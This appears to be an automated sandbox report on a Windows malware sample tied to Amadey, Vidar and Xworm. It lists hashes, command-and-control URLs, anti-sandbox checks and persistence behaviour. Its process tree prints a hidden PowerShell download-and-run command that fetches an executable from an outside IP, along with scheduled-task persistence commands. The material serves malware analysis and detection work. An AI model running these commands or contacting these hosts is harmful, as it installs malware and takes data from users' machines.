Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 09:15
Static task
static1
Behavioral task
behavioral1
Sample
fbd20cabacee9b0def4ea7c0c7340405.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fbd20cabacee9b0def4ea7c0c7340405.exe
Resource
win10v2004-20250217-en
General
-
Target
fbd20cabacee9b0def4ea7c0c7340405.exe
-
Size
1.8MB
-
MD5
fbd20cabacee9b0def4ea7c0c7340405
-
SHA1
f43864031c537e45ed653c82dd3e8aef4fcf32a9
-
SHA256
fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
-
SHA512
ceb4cb9fa7cf211f495e477ecb896852bba32bb230f825cfb0188733b80b12482d5ead72eea25ace0e032481547a6d8461c149539effde77c2cc8fa859629495
-
SSDEEP
49152:rMncqPrIpxu4Z0biPikcjaUpVd10oLYsdDXKZbcWvAbh3cgm3vTh:p71ZCUcjJXd1JdobhVTF
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/memory/2876-348-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/2168-234-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/2168-233-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/2168-228-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/2168-231-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/2168-226-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm -
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JqGBbm7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1824 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 18 2132 bPDDW9F.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 6 2816 rapes.exe 25 2816 rapes.exe 5 2816 rapes.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fbd20cabacee9b0def4ea7c0c7340405.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fbd20cabacee9b0def4ea7c0c7340405.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe -
Executes dropped EXE 24 IoCs
pid Process 2816 rapes.exe 2796 z3SJkC5.exe 2024 z3SJkC5.exe 1208 WiseTurbo.exe 1956 JqGBbm7.exe 1996 3Mv6i65.exe 2188 3Mv6i65.exe 1212 Process not Found 1592 khykuQw.exe 2340 zY9sqWs.exe 2132 bPDDW9F.exe 1612 d0HNrLB.exe 2168 d0HNrLB.exe 320 d0HNrLB.exe 324 d0HNrLB.exe 1700 JCFx2xj.exe 2316 7UlMpzX.exe 2260 x8VjDckmpTqIQoJjah.exe 948 VirtDlyE7xtCrw.iso 604 BXxKvLN.exe 2456 ShellKernelBridge.exe 2300 v6Oqdnc.exe 2100 VirtualBoxNetworkBridge.exe 916 f536072fa5.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine JqGBbm7.exe Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine v6Oqdnc.exe -
Loads dropped DLL 53 IoCs
pid Process 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 2816 rapes.exe 2796 z3SJkC5.exe 2024 z3SJkC5.exe 2024 z3SJkC5.exe 1208 WiseTurbo.exe 2920 WerFault.exe 2920 WerFault.exe 2920 WerFault.exe 2920 WerFault.exe 2920 WerFault.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 1996 3Mv6i65.exe 2188 3Mv6i65.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 2816 rapes.exe 1612 d0HNrLB.exe 564 WerFault.exe 564 WerFault.exe 564 WerFault.exe 564 WerFault.exe 564 WerFault.exe 560 WerFault.exe 560 WerFault.exe 560 WerFault.exe 560 WerFault.exe 560 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2468 WerFault.exe 2816 rapes.exe 2816 rapes.exe 2316 7UlMpzX.exe 2260 x8VjDckmpTqIQoJjah.exe 948 VirtDlyE7xtCrw.iso 948 VirtDlyE7xtCrw.iso 2816 rapes.exe 948 VirtDlyE7xtCrw.iso 948 VirtDlyE7xtCrw.iso 2816 rapes.exe 2816 rapes.exe 948 VirtDlyE7xtCrw.iso 948 VirtDlyE7xtCrw.iso 2816 rapes.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\d0HNrLB = "C:\\Users\\Admin\\AppData\\Roaming\\d0HNrLB.exe" d0HNrLB.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4eb-391.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 2816 rapes.exe 1956 JqGBbm7.exe 2300 v6Oqdnc.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1612 set thread context of 2168 1612 d0HNrLB.exe 46 PID 320 set thread context of 324 320 d0HNrLB.exe 54 PID 1700 set thread context of 2876 1700 JCFx2xj.exe 63 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job fbd20cabacee9b0def4ea7c0c7340405.exe File opened for modification C:\Windows\WindowsUpdate.log z3SJkC5.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0006000000019274-106.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 2920 2024 WerFault.exe 34 564 1612 WerFault.exe 45 560 1592 WerFault.exe 40 2468 320 WerFault.exe 53 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language khykuQw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JCFx2xj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JqGBbm7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f536072fa5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WiseTurbo.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2796 schtasks.exe 780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 2816 rapes.exe 1208 WiseTurbo.exe 1208 WiseTurbo.exe 1208 WiseTurbo.exe 1956 JqGBbm7.exe 2300 v6Oqdnc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1612 d0HNrLB.exe Token: SeDebugPrivilege 2168 d0HNrLB.exe Token: SeDebugPrivilege 320 d0HNrLB.exe Token: SeDebugPrivilege 324 d0HNrLB.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 916 f536072fa5.exe 916 f536072fa5.exe 916 f536072fa5.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 916 f536072fa5.exe 916 f536072fa5.exe 916 f536072fa5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2456 wrote to memory of 2816 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 31 PID 2456 wrote to memory of 2816 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 31 PID 2456 wrote to memory of 2816 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 31 PID 2456 wrote to memory of 2816 2456 fbd20cabacee9b0def4ea7c0c7340405.exe 31 PID 2816 wrote to memory of 2796 2816 rapes.exe 33 PID 2816 wrote to memory of 2796 2816 rapes.exe 33 PID 2816 wrote to memory of 2796 2816 rapes.exe 33 PID 2816 wrote to memory of 2796 2816 rapes.exe 33 PID 2796 wrote to memory of 2024 2796 z3SJkC5.exe 34 PID 2796 wrote to memory of 2024 2796 z3SJkC5.exe 34 PID 2796 wrote to memory of 2024 2796 z3SJkC5.exe 34 PID 2796 wrote to memory of 2024 2796 z3SJkC5.exe 34 PID 2024 wrote to memory of 1208 2024 z3SJkC5.exe 35 PID 2024 wrote to memory of 1208 2024 z3SJkC5.exe 35 PID 2024 wrote to memory of 1208 2024 z3SJkC5.exe 35 PID 2024 wrote to memory of 1208 2024 z3SJkC5.exe 35 PID 2024 wrote to memory of 2920 2024 z3SJkC5.exe 36 PID 2024 wrote to memory of 2920 2024 z3SJkC5.exe 36 PID 2024 wrote to memory of 2920 2024 z3SJkC5.exe 36 PID 2024 wrote to memory of 2920 2024 z3SJkC5.exe 36 PID 2816 wrote to memory of 1956 2816 rapes.exe 37 PID 2816 wrote to memory of 1956 2816 rapes.exe 37 PID 2816 wrote to memory of 1956 2816 rapes.exe 37 PID 2816 wrote to memory of 1956 2816 rapes.exe 37 PID 2816 wrote to memory of 1996 2816 rapes.exe 38 PID 2816 wrote to memory of 1996 2816 rapes.exe 38 PID 2816 wrote to memory of 1996 2816 rapes.exe 38 PID 2816 wrote to memory of 1996 2816 rapes.exe 38 PID 1996 wrote to memory of 2188 1996 3Mv6i65.exe 39 PID 1996 wrote to memory of 2188 1996 3Mv6i65.exe 39 PID 1996 wrote to memory of 2188 1996 3Mv6i65.exe 39 PID 2816 wrote to memory of 1592 2816 rapes.exe 40 PID 2816 wrote to memory of 1592 2816 rapes.exe 40 PID 2816 wrote to memory of 1592 2816 rapes.exe 40 PID 2816 wrote to memory of 1592 2816 rapes.exe 40 PID 2816 wrote to memory of 2340 2816 rapes.exe 41 PID 2816 wrote to memory of 2340 2816 rapes.exe 41 PID 2816 wrote to memory of 2340 2816 rapes.exe 41 PID 2816 wrote to memory of 2340 2816 rapes.exe 41 PID 2816 wrote to memory of 2132 2816 rapes.exe 43 PID 2816 wrote to memory of 2132 2816 rapes.exe 43 PID 2816 wrote to memory of 2132 2816 rapes.exe 43 PID 2816 wrote to memory of 2132 2816 rapes.exe 43 PID 2816 wrote to memory of 1612 2816 rapes.exe 45 PID 2816 wrote to memory of 1612 2816 rapes.exe 45 PID 2816 wrote to memory of 1612 2816 rapes.exe 45 PID 2816 wrote to memory of 1612 2816 rapes.exe 45 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 2168 1612 d0HNrLB.exe 46 PID 1612 wrote to memory of 564 1612 d0HNrLB.exe 47 PID 1612 wrote to memory of 564 1612 d0HNrLB.exe 47 PID 1612 wrote to memory of 564 1612 d0HNrLB.exe 47 PID 1612 wrote to memory of 564 1612 d0HNrLB.exe 47 PID 2168 wrote to memory of 2796 2168 d0HNrLB.exe 48 PID 2168 wrote to memory of 2796 2168 d0HNrLB.exe 48 PID 2168 wrote to memory of 2796 2168 d0HNrLB.exe 48 PID 2168 wrote to memory of 2796 2168 d0HNrLB.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fbd20cabacee9b0def4ea7c0c7340405.exe"C:\Users\Admin\AppData\Local\Temp\fbd20cabacee9b0def4ea7c0c7340405.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\TEMP\{84B22C0D-C6FF-41C2-9596-D3B921B5EAAD}\.cr\z3SJkC5.exe"C:\Windows\TEMP\{84B22C0D-C6FF-41C2-9596-D3B921B5EAAD}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=2124⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\TEMP\{5306EA84-B3D8-48B6-9E30-3F4C1F6C9330}\.ba\WiseTurbo.exeC:\Windows\TEMP\{5306EA84-B3D8-48B6-9E30-3F4C1F6C9330}\.ba\WiseTurbo.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 2085⤵
- Loads dropped DLL
- Program crash
PID:2920
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1956
-
-
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2188
-
-
-
C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 2404⤵
- Loads dropped DLL
- Program crash
PID:560
-
-
-
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2796
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 5084⤵
- Loads dropped DLL
- Program crash
PID:564
-
-
-
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1700 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2316 -
C:\Users\Admin\AppData\Local\.WindowTasks\x8VjDckmpTqIQoJjah.exe
- Executes dropped EXE
- Loads dropped DLL
PID:2260 -
C:\Users\Admin\AppData\Local\VirtualStore\VirtDlyE7xtCrw.iso
- Executes dropped EXE
- Loads dropped DLL
PID:948 -
C:\Users\Admin\AppData\Local\Microsoft\ShellKernelBridge.exe"C:/Users/Admin/AppData/Local/Microsoft/ShellKernelBridge.exe"6⤵
- Executes dropped EXE
PID:2456
-
-
C:\Users\Admin\AppData\Roaming\Oracle\VirtualBoxNetworkBridge.exe"C:/Users/Admin/AppData/Roaming/Oracle/VirtualBoxNetworkBridge.exe"6⤵
- Executes dropped EXE
PID:2100
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"3⤵
- Executes dropped EXE
PID:604
-
-
C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\10086770101\f536072fa5.exe"C:\Users\Admin\AppData\Local\Temp\10086770101\f536072fa5.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:916 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn nTSw5maIO6x /tr "mshta C:\Users\Admin\AppData\Local\Temp\qHhGT94Tf.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:2380
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn nTSw5maIO6x /tr "mshta C:\Users\Admin\AppData\Local\Temp\qHhGT94Tf.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:780
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\qHhGT94Tf.hta4⤵
- System Location Discovery: System Language Discovery
PID:1644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CGQNG0GLLEWGAILEAMKLECHE7VHX1IHY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
PID:1824
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E084184A-3EF5-4FDB-ACB1-93C87D315BB3} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]1⤵PID:2964
-
C:\Users\Admin\AppData\Roaming\d0HNrLB.exeC:\Users\Admin\AppData\Roaming\d0HNrLB.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:320 -
C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 320 -s 5123⤵
- Loads dropped DLL
- Program crash
PID:2468
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
7.8MB
MD5001d7acad697c62d8a2bd742c4955c26
SHA1840216756261f1369511b1fd112576b3543508f7
SHA256de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb
-
Filesize
2.9MB
MD530c1a6337089e68b975438caebc8f497
SHA12cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
SHA512be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484
-
Filesize
7.1MB
MD5360e9aa39065352478da372c3c3b9b43
SHA1ca3d4bf6898f9771917650462eeb3571d02f5cf0
SHA256da7f6e4ab38830bf7da4384c246f8e374f0ff6a667af15540dc5b04a50a8d21e
SHA51204218cb5c3ff3002c02616dcf4b698621e2d5adc7a6bc6a1a02ea80d3e7f57635b1956f2604dee74dfc09ddf935b3c324b1cc0faff858b003597e75e69fa3bfe
-
Filesize
7.6MB
MD5accdbd5044408c82c19c977829713e4f
SHA1070a001ac12139cc1238017d795a2b43ac52770d
SHA256dfa2ab0714c9f234b63fd1295ce468bd247465701a90b8a9ab9eb3d6d032d258
SHA51234fe4ec1307e7d45080b6e0fb093eb8f1d43fb71a3e3411e32a5798f9cacc69ea1b82d56fcf9e503dd22c51e9af92fde7c149ac5882af4daab5c3cb906cdeb85
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
1.3MB
MD5cde0f4bf8c4605529175bbb5e86c6bad
SHA18194071706458c456a021e8e17b0a63ba3b54b44
SHA256989ab0b506d60a468a8ab919dd973cae0f00072d60615d9b0243825e4b4a4e7e
SHA512265a84c26b56abdd0548503eea7b1ce76b6661ce874e7ef0235dad6d424b568ac104adf5324ee164924b67d4865222e5bc4567ea4ce67b39f08215ad301697ea
-
Filesize
277KB
MD5d1458dc39b290683cefbb01cc5b0991a
SHA1e9749971be9d943cb2a62e2be5eb442161876ec6
SHA256dc7d690adb8ea5ab1a9b1f65fc3a62b35d9ae4c57a7806ccb226b825f1465f2d
SHA512f90bc037576ee1205fa260d5b6b05c95f930025bc40f541b92f39b845b8e9a90a59ec18ef0be1ab5cf7bb74ed6a6222fc1a882df894ba8e1e722d671aef37e35
-
Filesize
12.4MB
MD57ff72f21d83d3abdc706781fb3224111
SHA13bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
